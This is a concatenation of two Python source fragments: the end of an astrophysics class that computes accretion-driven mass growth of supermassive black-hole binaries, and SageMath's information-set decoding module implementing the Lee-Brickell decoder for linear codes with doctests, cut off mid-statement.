idx = reduce(np.intersect1d,(np.where(np.abs(self.dadt_gw[i])>np.abs(self.dadt_df[i]))[0],
np.where(np.abs(self.dadt_gw[i])>np.abs(self.dadt_lc[i]))[0],
np.where(np.abs(self.dadt_gw[i])>np.abs(self.dadt_vd[i]))[0]))[0]
R_gw[i]=[i,idx,self.sep[i][idx]]
except:
R_gw[i]=[i,np.nan,np.nan]
return R_gw
def find_mbin_at_Rvd(self):
"""
finding mass growth upto disk phase
"""
R_vd = self.find_Rvd()
mbin_at_rdisk = np.zeros(self.mtot.size)
for mm in range(self.mtot.size):
ti = self.times[mm]
mdoti = self.mdot[mm]
if np.isnan(np.sum(R_vd[mm])):
condition = (self.scales[mm] > 0.0) & (self.scales[mm] < 1.0) & (self.sep[mm]>np.nanmedian(R_vd[:,-1]))
else:
condition = (self.scales[mm] > 0.0) & (self.scales[mm] < 1.0) & (self.sep[mm]>R_vd[mm][-1])
ti = ti[condition]
mdoti = mdoti[condition]
delta_ti = np.diff(ti)
mdot_av = 0.5*(mdoti[1:]+mdoti[:-1])
dmi = mdot_av*delta_ti
mbin_at_rdisk[mm] = self.mtot[mm] + np.nansum(dmi)
return mbin_at_rdisk
def find_mrgr_idx(self):
idx_merged_by_z0 =[]
idx_not_merged_by_z0 =[]
for i in range(len(self.z)):
if 0 in self.z[i]:
idx_not_merged_by_z0.append(i)
else:
idx = np.where(np.isinf(self.z[i]))[0][0]
idx_merged_by_z0.append(i)
return np.array(idx_merged_by_z0), np.array(idx_not_merged_by_z0)
def dm_disk_phase(self):
"""
finding mass growth during disk phase
"""
R_vd = self.find_Rvd()
R_gw = self.find_Rgw()
m1_after_disk = np.zeros(self.mtot.size)
m2_after_disk = np.zeros(self.mtot.size)
q_after_disk = -1*np.ones(self.mtot.size)
for mm in tqdm(range(self.mtot.size)):
ti = self.times[mm]
mdoti = self.mdot[mm]
if np.isnan(np.sum(R_vd[mm])):
if np.isnan(np.sum(R_gw[mm])):
print ('this binary has niether a gas dominated phase nor a gw dominated phase')
condition = (self.scales[mm] > 0.0) & (self.scales[mm] < 1.0) & (self.sep[mm]<=np.nanmedian(R_vd[:,-1]))
else:
condition = (self.scales[mm] > 0.0) & (self.scales[mm] < 1.0) & (R_gw[mm][-1]<self.sep[mm]) & (self.sep[mm] <=np.nanmedian(R_vd[:,-1]))
else:
if np.isnan(np.sum(R_gw[mm])):
#gas dominated all the way
condition = (self.scales[mm] > 0.0) & (self.scales[mm] < 1.0) & (self.sep[mm]<=R_vd[mm][-1])
else:
condition = (self.scales[mm] > 0.0) & (self.scales[mm] < 1.0) & (R_gw[mm][-1]<self.sep[mm]) & (self.sep[mm]<=R_vd[mm][-1])
ti = ti[condition]
mdoti = mdoti[condition]
delta_ti = np.diff(ti)
mdot_av = 0.5*(mdoti[1:]+mdoti[:-1])
cond_idx = np.where(condition==True)
qi = self.q[mm]
m1_fin = self.m1[mm]
m2_fin = self.m2[mm]
for jj in range(mdot_av.size):
mdot1, mdot2 = dfn.dm1dm2_lk(qi, mdot_av[jj])
dm1 = mdot1*delta_ti[jj]
dm2 = mdot2*delta_ti[jj]
m1_fin = m1_fin + dm1
m2_fin = m2_fin + dm2
qi = m2_fin/m1_fin
m1_after_disk[mm] = m1_fin
m2_after_disk[mm] = m2_fin
q_after_disk[mm] = qi
return m1_after_disk, m2_after_disk
def mbin_after_insp(self):
"""
finding mass growth for the whole inspiral
"""
R_vd = self.find_Rvd()
mbin_after_insp = np.zeros(self.mtot.size)
for mm in range(self.mtot.size):
ti = self.times[mm]
mdoti = self.mdot[mm]
condition = (self.scales[mm] > 0.0) & (self.scales[mm] < 1.0)
ti = ti[condition]
mdoti = mdoti[condition]
delta_ti = np.diff(ti)
mdot_av = 0.5*(mdoti[1:]+mdoti[:-1])
dmi = mdot_av*delta_ti
dm = np.nansum(dmi)
mbin_after_insp[mm] = self.mtot[mm] + dm
return mbin_after_insp | StarcoderdataPython |
24143 | # -*- coding: utf-8 -*-
r"""
Information-set decoding for linear codes
Information-set decoding is a probabilistic decoding strategy that
essentially tries to guess `k` correct positions in the received word,
where `k` is the dimension of the code. A codeword agreeing with the
received word on the guessed position can easily be computed, and their
difference is one possible error vector. A "correct" guess is assumed when
this error vector has low Hamming weight.
This simple algorithm is not very efficient in itself, but there are numerous
refinements to the strategy that make it very capable over rather large codes.
Still, the decoding algorithm is exponential in dimension of the code and the
log of the field size.
The ISD strategy requires choosing how many errors is deemed acceptable. One
choice could be `d/2`, where `d` is the minimum distance of the code, but
sometimes `d` is not known, or sometimes more errors are expected. If one
chooses anything above `d/2`, the algorithm does not guarantee to return a
nearest codeword.
AUTHORS:
- <NAME>, <NAME>, <NAME> (2016-02, 2017-06): initial
version
"""
#******************************************************************************
# Copyright (C) 2017 <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# http://www.gnu.org/licenses/
#******************************************************************************
from sage.all import ZZ, Integer, vector, SageObject, binomial
from .decoder import Decoder
def _format_decoding_interval(decoding_interval):
r"""
Format the decoding interval of an ISD decoder when calling ``_repr_`` or
``_latex_``.
EXAMPLES::
sage: from sage.coding.information_set_decoder import _format_decoding_interval
sage: _format_decoding_interval((0,3))
'up to 3'
sage: _format_decoding_interval((2,3))
'between 2 and 3'
sage: _format_decoding_interval((3,3))
'exactly 3'
"""
if decoding_interval[0] == 0:
return "up to {0}".format(decoding_interval[1])
if decoding_interval[0] == decoding_interval[1]:
return "exactly {0}".format(decoding_interval[0])
return "between {0} and {1}".format(decoding_interval[0], decoding_interval[1])
class InformationSetAlgorithm(SageObject):
r"""
Abstract class for algorithms for
:class:`sage.coding.information_set_decoder.LinearCodeInformationSetDecoder`.
To sub-class this class, override ``decode`` and ``calibrate``, and call the
super constructor from ``__init__``.
INPUT:
- ``code`` -- A linear code for which to decode.
- ``number_errors`` -- an integer, the maximal number of errors to accept as
correct decoding. An interval can also be specified by giving a pair of
integers, where both end values are taken to be in the interval.
- ``algorithm_name`` -- A name for the specific ISD algorithm used (used for
printing).
- ``parameters`` -- (optional) A dictionary for setting the parameters of
this ISD algorithm. Note that sanity checking this dictionary for the
individual sub-classes should be done in the sub-class constructor.
EXAMPLES::
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: LeeBrickellISDAlgorithm(codes.GolayCode(GF(2)), (0,4))
ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 4 errors
A minimal working example of how to sub-class::
sage: from sage.coding.information_set_decoder import InformationSetAlgorithm
sage: from sage.coding.decoder import DecodingError
sage: class MinimalISD(InformationSetAlgorithm):
....: def __init__(self, code, decoding_interval):
....: super(MinimalISD, self).__init__(code, decoding_interval, "MinimalISD")
....: def calibrate(self):
....: self._parameters = { } # calibrate parameters here
....: self._time_estimate = 10.0 # calibrated time estimate
....: def decode(self, r):
....: # decoding algorithm here
....: raise DecodingError("I failed")
sage: MinimalISD(codes.GolayCode(GF(2)), (0,4))
ISD Algorithm (MinimalISD) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 4 errors
"""
def __init__(self, code, decoding_interval, algorithm_name, parameters = None):
r"""
TESTS::
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: LeeBrickellISDAlgorithm(codes.GolayCode(GF(2)), (0,4))
ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 4 errors
"""
self._code = code
self._decoding_interval = decoding_interval
self._algorithm_name = algorithm_name
if parameters:
self._parameters = parameters
self._parameters_specified = True
else:
self._parameters_specified = False
def name(self):
r"""
Return the name of this ISD algorithm.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0,2))
sage: A.name()
'Lee-Brickell'
"""
return self._algorithm_name
def decode(self, r):
r"""
Decode a received word using this ISD decoding algorithm.
Must be overridden by sub-classes.
EXAMPLES::
sage: M = matrix(GF(2), [[1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0],\
[0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 1, 1],\
[0, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0],\
[0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1],\
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1]])
sage: C = codes.LinearCode(M)
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (2,2))
sage: r = vector(GF(2), [1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
sage: A.decode(r)
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
"""
raise NotImplementedError
def time_estimate(self):
"""
Estimate for how long this ISD algorithm takes to perform a single decoding.
The estimate is for a received word whose number of errors is within the
decoding interval of this ISD algorithm.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0,2))
sage: A.time_estimate() #random
0.0008162108571427874
"""
if not hasattr(self, "_time_estimate"):
self.calibrate()
return self._time_estimate
def calibrate(self):
"""
Uses test computations to estimate optimal values for any parameters
this ISD algorithm may take.
Must be overridden by sub-classes.
If ``self._parameters_specified`` is ``False``, this method shall set
``self._parameters`` to the best parameters estimated. It shall always
set ``self._time_estimate`` to the time estimate of using
``self._parameters``.
EXAMPLES::
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: C = codes.GolayCode(GF(2))
sage: A = LeeBrickellISDAlgorithm(C, (0,3))
sage: A.calibrate()
sage: A.parameters() #random
{'search_size': 1}
"""
raise NotImplementedError
def code(self):
r"""
Return the code associated to this ISD algorithm.
EXAMPLES::
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: C = codes.GolayCode(GF(2))
sage: A = LeeBrickellISDAlgorithm(C, (0,3))
sage: A.code()
[24, 12, 8] Extended Golay code over GF(2)
"""
return self._code
def decoding_interval(self):
r"""
A pair of integers specifying the interval of number of errors this
ISD algorithm will attempt to correct.
The interval includes both end values.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0,2))
sage: A.decoding_interval()
(0, 2)
"""
return self._decoding_interval
def parameters(self):
"""
Return any parameters this ISD algorithm uses.
If the parameters have not already been set, efficient values will first
be calibrated and returned.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0,4), search_size=3)
sage: A.parameters()
{'search_size': 3}
If not set, calibration will determine a sensible value::
sage: A = LeeBrickellISDAlgorithm(C, (0,4))
sage: A.parameters() #random
{'search_size': 1}
"""
if not hasattr(self, "_parameters"):
self.calibrate()
return self._parameters
def __eq__(self, other):
r"""
Tests equality between ISD algorithm objects.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0,4))
sage: A == LeeBrickellISDAlgorithm(C, (0,4))
True
sage: A == LeeBrickellISDAlgorithm(C, (0,5))
False
sage: other_search = 1 if A.parameters()['search_size'] != 1 else 2
sage: A == LeeBrickellISDAlgorithm(C, (0,4), search_size=other_search)
False
ISD Algorithm objects can be equal only if they have both calibrated
the parameters, or if they both had it set and to the same value::
sage: A2 = LeeBrickellISDAlgorithm(C, (0,4), search_size=A.parameters()['search_size'])
sage: A == A2
False
sage: A2 == LeeBrickellISDAlgorithm(C, (0,4), search_size=A.parameters()['search_size'])
True
"""
return isinstance(other, self.__class__)\
and self.code() == other.code()\
and self.decoding_interval() == other.decoding_interval()\
and self._parameters_specified == other._parameters_specified\
and (not self._parameters_specified or self.parameters() == other.parameters())
def __hash__(self):
r"""
Returns the hash value of ``self``.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0,4))
sage: hash(A) #random
5884357732955478461
sage: C2 = codes.GolayCode(GF(3))
sage: A2 = LeeBrickellISDAlgorithm(C2, (0,4))
sage: hash(A) != hash(A2)
True
"""
return hash(str(self))
def _repr_(self):
r"""
Returns a string representation of this ISD algorithm.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0,4))
sage: A
ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 4 errors
"""
return "ISD Algorithm ({}) for {} decoding {} errors ".format(self._algorithm_name, self.code(), _format_decoding_interval(self.decoding_interval()))
def _latex_(self):
r"""
Returns a latex representation of this ISD algorithm.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0,4))
sage: latex(A)
\textnormal{ISD Algorithm (Lee-Brickell) for }[24, 12, 8] \textnormal{ Extended Golay Code over } \Bold{F}_{2} \textnormal{decoding up to 4 errors}
"""
return "\\textnormal{{ISD Algorithm ({}) for }}{} \\textnormal{{decoding {} errors}}".format(self._algorithm_name, self.code()._latex_(), _format_decoding_interval(self.decoding_interval()))
class LeeBrickellISDAlgorithm(InformationSetAlgorithm):
r"""
The Lee-Brickell algorithm for information-set decoding.
For a description of the information-set decoding paradigm (ISD), see
:class:`sage.coding.information_set_decoder.LinearCodeInformationSetDecoder`.
This implements the Lee-Brickell variant of ISD, see [LB1988]_ for the
original binary case, and [Pet2010]_ for the `q`-ary extension.
Let `C` be a `[n, k]`-linear code over `GF(q)`, and let `r \in GF(q)^{n}` be
a received word in a transmission. We seek the codeword whose Hamming
distance from `r` is minimal. Let `p` and `w` be integers, such that `0\leq
p\leq w`, Let `G` be a generator matrix of `C`, and for any set of indices
`I`, we write `G_{I}` for the matrix formed by the columns of `G` indexed by
`I`. The Lee-Brickell ISD loops the following until it is successful:
1. Choose an information set `I` of `C`.
2. Compute `r' = r - r_{I}\times G_I^{-1} \times G`
3. Consider every size-`p` subset of `I`, `\{a_1, \dots, a_p\}`.
For each `m = (m_1, \dots, m_p) \in GF(q)^{p}`, compute
the error vector `e = r' - \sum_{i=1}^{p} m_i\times g_{a_i}`,
4. If `e` has a Hamming weight at most `w`, return `r-e`.
INPUT:
- ``code`` -- A linear code for which to decode.
- ``decoding_interval`` -- a pair of integers specifying an interval of
number of errors to correct. Includes both end values.
- ``search_size`` -- (optional) the size of subsets to use on step 3 of the
algorithm as described above. Usually a small number. It has to be at most
the largest allowed number of errors. A good choice will be approximated
if this option is not set; see
:meth:`sage.coding.LeeBrickellISDAlgorithm.calibrate`
for details.
EXAMPLES::
sage: C = codes.GolayCode(GF(2))
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0,4)); A
ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 4 errors
sage: C = codes.GolayCode(GF(2))
sage: A = LeeBrickellISDAlgorithm(C, (2,3)); A
ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding between 2 and 3 errors
"""
def __init__(self, code, decoding_interval, search_size = None):
r"""
TESTS:
If ``search_size`` is not a positive integer, or is bigger than the
decoding radius, an error will be raised::
sage: C = codes.GolayCode(GF(2))
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: LeeBrickellISDAlgorithm(C, (1, 3), search_size=-1)
Traceback (most recent call last):
...
ValueError: The search size parameter has to be a positive integer
sage: LeeBrickellISDAlgorithm(C, (1, 3), search_size=4)
Traceback (most recent call last):
...
ValueError: The search size parameter has to be at most the maximal number of allowed errors
"""
if search_size is not None:
if not isinstance(search_size, (Integer, int)) or search_size < 0:
raise ValueError("The search size parameter has to be a positive integer")
if search_size > decoding_interval[1]:
raise ValueError("The search size parameter has to be at most"
" the maximal number of allowed errors")
super(LeeBrickellISDAlgorithm, self).__init__(code, decoding_interval, "Lee-Brickell",
parameters={ 'search_size': search_size })
self._parameters_specified = True
else:
self._parameters_specified = False
super(LeeBrickellISDAlgorithm, self).__init__(code, decoding_interval, "Lee-Brickell")
def decode(self, r):
r"""
The Lee-Brickell algorithm as described in the class doc.
Note that either parameters must be given at construction time or
:meth:`sage.coding.information_set_decoder.InformationSetAlgorithm.calibrate()`
should be called before calling this method.
INPUT:
- `r` -- a received word, i.e. a vector in the ambient space of
:meth:`decoder.Decoder.code`.
OUTPUT: A codeword whose distance to `r` satisfies ``self.decoding_interval()``.
EXAMPLES::
sage: M = matrix(GF(2), [[1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0],\
[0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 1, 1],\
[0, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0],\
[0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1],\
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1]])
sage: C = codes.LinearCode(M)
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (2,2))
sage: c = C.random_element()
sage: Chan = channels.StaticErrorRateChannel(C.ambient_space(), 2)
sage: r = Chan(c)
sage: c_out = A.decode(r)
sage: (r - c).hamming_weight() == 2
True
"""
import itertools
from sage.misc.prandom import sample
C = self.code()
n, k = C.length(), C.dimension()
tau = self.decoding_interval()
p = self.parameters()['search_size']
F = C.base_ring()
G = C.generator_matrix()
Fstar = F.list()[1:]
while True:
# step 1.
I = sample(range(n), k)
Gi = G.matrix_from_columns(I)
try:
Gi_inv = Gi.inverse()
except ZeroDivisionError:
# I was not an information set
continue
Gt = Gi_inv * G
#step 2.
y = r - vector([r[i] for i in I]) * Gt
g = Gt.rows()
#step 3.
for pi in range(p+1):
for A in itertools.combinations(range(k), pi):
for m in itertools.product(Fstar, repeat=pi):
e = y - sum(m[i]*g[A[i]] for i in range(pi))
errs = e.hamming_weight()
if errs >= tau[0] and errs <= tau[1]:
return r - e
def calibrate(self):
r"""
Run some test computations to estimate the optimal search size.
Let `p` be the search size. We should simply choose `p` such that the
average expected time is minimal. The algorithm succeeds when it chooses
an information set with at least `k - p` correct positions, where `k` is
the dimension of the code and `p` the search size. The expected number
of trials we need before this occurs is:
.. MATH::
\binom{n}{k}/(\rho \sum_{i=0}^p \binom{n-\tau}{k-i} \binom{\tau}{i})
Here `\rho` is the fraction of `k` subsets of indices which are
information sets. If `T` is the average time for steps 1 and 2
(including selecting `I` until an information set is found), while `P(i)`
is the time for the body of the ``for``-loop in step 3 for `m` of weight
`i`, then each information set trial takes roughly time `T +
\sum_{i=0}^{p} P(i) \binom{k}{i} (q-1)^i`, where `\GF{q}` is the base
field.
The values `T` and `P` are here estimated by running a few test
computations similar to those done by the decoding algorithm.
We don't explicitly estimate `\rho`.
OUTPUT: Does not output anything but sets private fields used by
:meth:`sage.coding.information_set_decoder.InformationSetAlgorithm.parameters()`
and
:meth:`sage.coding.information_set_decoder.InformationSetAlgorithm.time_estimate()``.
EXAMPLES::
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: C = codes.GolayCode(GF(2))
sage: A = LeeBrickellISDAlgorithm(C, (0,3)); A
ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 3 errors
sage: A.calibrate()
sage: A.parameters() #random
{'search_size': 1}
sage: A.time_estimate() #random
0.0008162108571427874
If we specify the parameter at construction time, calibrate does not override this choice::
sage: A = LeeBrickellISDAlgorithm(C, (0,3), search_size=2); A
ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 3 errors
sage: A.parameters()
{'search_size': 2}
sage: A.calibrate()
sage: A.parameters()
{'search_size': 2}
sage: A.time_estimate() #random
0.0008162108571427874
"""
from sage.matrix.special import random_matrix
from sage.misc.prandom import sample, randint
from sage.modules.free_module_element import random_vector
from time import process_time
C = self.code()
G = C.generator_matrix()
n, k = C.length(), C.dimension()
tau = self.decoding_interval()[1]
F = C.base_ring()
q = F.cardinality()
Fstar = F.list()[1:]
def time_information_set_steps():
before = process_time()
while True:
I = sample(range(n), k)
Gi = G.matrix_from_columns(I)
try:
Gi_inv = Gi.inverse()
except ZeroDivisionError:
continue
return process_time() - before
def time_search_loop(p):
y = random_vector(F, n)
g = random_matrix(F, p, n).rows()
scalars = [ [ Fstar[randint(0,q-2)] for i in range(p) ]
for s in range(100) ]
before = process_time()
for m in scalars:
e = y - sum(m[i]*g[i] for i in range(p))
return (process_time() - before) / 100.
T = sum([ time_information_set_steps() for s in range(5) ]) / 5.
P = [ time_search_loop(p) for p in range(tau+1) ]
def compute_estimate(p):
iters = 1.* binomial(n, k)/ \
sum( binomial(n-tau, k-i)*binomial(tau,i) for i in range(p+1) )
estimate = iters*(T + \
sum(P[pi] * (q-1)**pi * binomial(k, pi) for pi in range(p+1) ))
return estimate
if self._parameters_specified:
self._time_estimate = compute_estimate(self._parameters['search_size'])
else:
self._calibrate_select([ compute_estimate(p) for p in range(tau+1) ])
def _calibrate_select(self, estimates):
r"""
Internal method used by ``self.calibrate()``.
Given the timing estimates, select the best parameter and set the
appropriate private fields.
INPUT:
- `estimates` - list of time estimates, for the search size set to the
index of the list entry.
OUTPUT: None, but sets the private fields `self._parameters` and
`self._time_estimate`.
TESTS::
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: C = codes.GolayCode(GF(2))
sage: A = LeeBrickellISDAlgorithm(C, (0,3)); A
ISD Algorithm (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 3 errors
sage: A._calibrate_select([ 1.0, 2.0, 3.0, 0.5, 0.6, 1.0 ])
sage: A._time_estimate
0.500000000000000
sage: A._parameters
{'search_size': 3}
"""
search_size = 0
for p in range(1, len(estimates)):
if estimates[p] < estimates[search_size]:
search_size = p
self._parameters = { 'search_size': search_size }
self._time_estimate = estimates[search_size]
class LinearCodeInformationSetDecoder(Decoder):
r"""
Information-set decoder for any linear code.
Information-set decoding is a probabilistic decoding strategy that
essentially tries to guess `k` correct positions in the received word,
where `k` is the dimension of the code. A codeword agreeing with the
received word on the guessed position can easily be computed, and their
difference is one possible error vector. A "correct" guess is assumed when
this error vector has low Hamming weight.
The ISD strategy requires choosing how many errors is deemed acceptable. One
choice could be `d/2`, where `d` is the minimum distance of the code, but
sometimes `d` is not known, or sometimes more errors are expected. If one
chooses anything above `d/2`, the algorithm does not guarantee to return a
nearest codeword.
This simple algorithm is not very efficient in itself, but there are numerous
refinements to the strategy. Specifying which strategy to use among those
that Sage knows is done using the ``algorithm`` keyword. If this is not set,
an efficient choice will be made for you.
The various ISD algorithms all need to select a number of parameters. If you
choose a specific algorithm to use, you can pass these parameters as named
parameters directly to this class' constructor. If you don't, efficient
choices will be calibrated for you.
.. WARNING::
If there is no codeword within the specified decoding distance, then the
decoder may never terminate, or it may raise a
:exc:`sage.coding.decoder.DecodingError` exception, depending on the ISD
algorithm used.
INPUT:
- ``code`` -- A linear code for which to decode.
- ``number_errors`` -- an integer, the maximal number of errors to accept as
correct decoding. An interval can also be specified by giving a pair of
integers, where both end values are taken to be in the interval.
- ``algorithm`` -- (optional) the string name of the ISD algorithm to
employ. If this is not set, an appropriate one will be chosen.
A constructed
:class:`sage.coding.information_set_decoder.InformationSetAlgorithm`
object may also be given. In this case ``number_errors`` must match that
of the passed algorithm.
- ``**kwargs`` -- (optional) any number of named arguments passed on to the
ISD algorithm. Such are usually not required, and they can only be set if
``algorithm`` is set to a specific algorithm. See the documentation for
each individual ISD algorithm class for information on any named arguments
they may accept. The easiest way to access this documentation is to first
construct the decoder without passing any named arguments, then accessing
the ISD algorithm using
:meth:`sage.coding.information_set_decoder.LinearCodeInformationSetDecoder.algorithm`,
and then reading the `?` help on the constructed object.
EXAMPLES:
The principal way to access this class is through the
:meth:`sage.code.linear_code.AbstractLinearCode.decoder` method::
sage: C = codes.GolayCode(GF(3))
sage: D = C.decoder("InformationSet", 2); D
Information-set decoder (Lee-Brickell) for [12, 6, 6] Extended Golay code over GF(3) decoding up to 2 errors
You can specify which algorithm you wish to use, and you should do so in
order to pass special parameters to it::
sage: C = codes.GolayCode(GF(3))
sage: D2 = C.decoder("InformationSet", 2, algorithm="Lee-Brickell", search_size=2); D2
Information-set decoder (Lee-Brickell) for [12, 6, 6] Extended Golay code over GF(3) decoding up to 2 errors
sage: D2.algorithm()
ISD Algorithm (Lee-Brickell) for [12, 6, 6] Extended Golay code over GF(3) decoding up to 2 errors
sage: D2.algorithm().parameters()
{'search_size': 2}
If you specify an algorithm which is not known, you get a friendly error message::
sage: C.decoder("InformationSet", 2, algorithm="NoSuchThing")
Traceback (most recent call last):
...
ValueError: Unknown ISD algorithm 'NoSuchThing'. The known algorithms are ['Lee-Brickell'].
You can also construct an ISD algorithm separately and pass that. This is
mostly useful if you write your own ISD algorithms::
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0, 2))
sage: D = C.decoder("InformationSet", 2, algorithm=A); D
Information-set decoder (Lee-Brickell) for [12, 6, 6] Extended Golay code over GF(3) decoding up to 2 errors
When passing an already constructed ISD algorithm, you can't also pass
parameters to the ISD algorithm when constructing the decoder::
sage: C.decoder("InformationSet", 2, algorithm=A, search_size=2)
Traceback (most recent call last):
...
ValueError: ISD algorithm arguments are not allowed when supplying a constructed ISD algorithm
We can also information-set decode non-binary codes::
sage: C = codes.GolayCode(GF(3))
sage: D = C.decoder("InformationSet", 2); D
Information-set decoder (Lee-Brickell) for [12, 6, 6] Extended Golay code over GF(3) decoding up to 2 errors
There are two other ways to access this class::
sage: D = codes.decoders.LinearCodeInformationSetDecoder(C, 2); D
Information-set decoder (Lee-Brickell) for [12, 6, 6] Extended Golay code over GF(3) decoding up to 2 errors
sage: from sage.coding.information_set_decoder import LinearCodeInformationSetDecoder
sage: D = LinearCodeInformationSetDecoder(C, 2); D
Information-set decoder (Lee-Brickell) for [12, 6, 6] Extended Golay code over GF(3) decoding up to 2 errors
"""
def __init__(self, code, number_errors, algorithm=None, **kwargs):
r"""
TESTS:
``number_errors`` has to be either a list of Integers/ints, a tuple of Integers/ints,
or an Integer/int::
sage: C = codes.GolayCode(GF(2))
sage: D = C.decoder("InformationSet", "aa")
Traceback (most recent call last):
...
ValueError: number_errors should be an integer or a pair of integers
If ``number_errors`` is passed as a list/tuple, it has to contain only
two values, the first one being at most the second one::
sage: C = codes.GolayCode(GF(2))
sage: D = C.decoder("InformationSet", (4, 2))
Traceback (most recent call last):
...
ValueError: number_errors should be a positive integer or a valid interval within the positive integers
You cannot ask the decoder to correct more errors than the code length::
sage: D = C.decoder("InformationSet", 25)
Traceback (most recent call last):
...
ValueError: The provided number of errors should be at most the code's length
If ``algorithm`` is not set, additional parameters cannot be passed to
the ISD algorithm::
sage: D = C.decoder("InformationSet", 2, search_size=2)
Traceback (most recent call last):
...
ValueError: Additional arguments to an information-set decoder algorithm are only allowed if a specific algorithm is selected by setting the algorithm keyword
If ``algorithm`` is set to a constructed ISD algorithm, additional
parameters cannot be passed to the ISD algorithm::
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0, 2))
sage: D = C.decoder("InformationSet", 2, A, search_size=3)
Traceback (most recent call last):
...
ValueError: ISD algorithm arguments are not allowed when supplying a constructed ISD algorithm
If ``algorithm`` is set to a constructed
:class:`sage.coding.information_set_decoder.InformationSetAlgorithm`,
then ``number_errors`` must match that of the algorithm::
sage: C = codes.GolayCode(GF(2))
sage: from sage.coding.information_set_decoder import LeeBrickellISDAlgorithm
sage: A = LeeBrickellISDAlgorithm(C, (0, 2))
sage: D = C.decoder("InformationSet", 2, A); D
Information-set decoder (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 2 errors
sage: D = C.decoder("InformationSet", (0,2), A); D
Information-set decoder (Lee-Brickell) for [24, 12, 8] Extended Golay code over GF(2) decoding up to 2 errors
sage: D = C.decoder("InformationSet", 3, A); D
Traceback (most recent call last):
...
ValueError: number_errors must match that of the passed ISD algorithm
"""
if isinstance(number_errors, (Integer, int)):
number_errors = (0, number_errors)
if isinstance(number_errors, (tuple, list)) and len(number_errors) == 2 \
and number_errors[0] in ZZ and number_errors[1] in ZZ:
if 0 > number_errors[0] or number_errors[0] > number_errors[1]:
raise ValueError(
"number_errors should be a positive integer or"
" a valid interval within the positive integers")
if number_errors[1] > code.length():
raise ValueError("The provided number of errors should be at"
" most the code's length")
else:
raise ValueError("number_errors should be an integer or a pair of integers")
self._number_errors = number_errors
super(LinearCodeInformationSetDecoder, self).__init__(
code, code.ambient_space(), code._default_encoder_name)
if algorithm is None:
if kwargs:
raise ValueError("Additional arguments to an information-set decoder"
" algorithm are only allowed if a specific"
" algorithm is selected by setting the algorithm"
" keyword")
algorithm = "Lee-Brickell"
algorithm_names = LinearCodeInformationSetDecoder.known_algorithms(dictionary=True)
if isinstance(algorithm, InformationSetAlgorithm):
if kwargs:
raise ValueError("ISD algorithm arguments are not allowed when"
" supplying a constructed ISD algorithm")
if number_errors != algorithm.decoding_interval():
raise ValueError("number_errors must match that of the passed"
